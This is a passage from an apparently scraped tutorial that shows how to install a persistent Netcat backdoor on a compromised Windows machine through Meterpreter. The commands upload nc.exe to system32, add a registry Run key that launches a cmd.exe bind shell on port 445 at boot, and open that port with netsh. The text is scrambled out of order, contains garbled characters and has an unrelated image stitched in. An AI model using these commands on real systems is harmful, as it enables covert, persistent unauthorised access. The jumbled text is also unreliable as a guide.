So with that being completed, we will reboot the remote system and test out the Netcat shell. Netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALLĬ:\Documents and Settings\Jim\My Documents > netsh firewall show portopeningĬ:\Documents and Settings\Jim\My Documents > C:\Documents and Settings\Jim\My Documents > netsh firewall add portopening TCP 445 "Service Firewall" ENABLE ALL We open up port 445 in the firewall and double-check that it was set properly. Local Area Connection firewall configuration: Standard profile configuration (current):
![nc netcat windows nc netcat windows](https://media.geeksforgeeks.org/wp-content/uploads/20200505144851/To-send-an-HTTP-Request-Using-Netcat-Command-in-Linux.png)
meterpreter > execute -f cmd -iĬ:\Documents and Settings\Jim\My Documents > netsh firewall show opmode
#NC NETCAT WINDOWS PATCH#
Plus, the process shown should work across more versions of Windows, as registry locations and functions are highly version and patch level dependent. We open up an interactive command prompt and use the netsh command to make the changes as it is far less error-prone than altering the registry directly. Next, we need to alter the system to allow remote connections through the firewall to our Netcat backdoor. Key: HKLM\software\microsoft\windows\currentversion\Runĭata: C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe Meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc Meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 445 -e cmd.exe' meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\runĮnumerating: HKLM\software\microsoft\windows\currentversion\run We do this by editing the key ‘HKLM\software\microsoft\windows\currentversion\run’. uploaded : /usr/share/windows-binaries/nc.exe -> C:\windows\system32nc.exeĪfterwards, we work with the registry to have netcat execute on start up and listen on port 445. uploading : /usr/share/windows-binaries/nc.exe -> C:\windows\system32 meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 This includes changes to the system registry and firewall.įirst, we must upload a copy of Netcat to the remote system. In this example, instead of looking up information on the remote system, we will be installing a Netcat backdoor.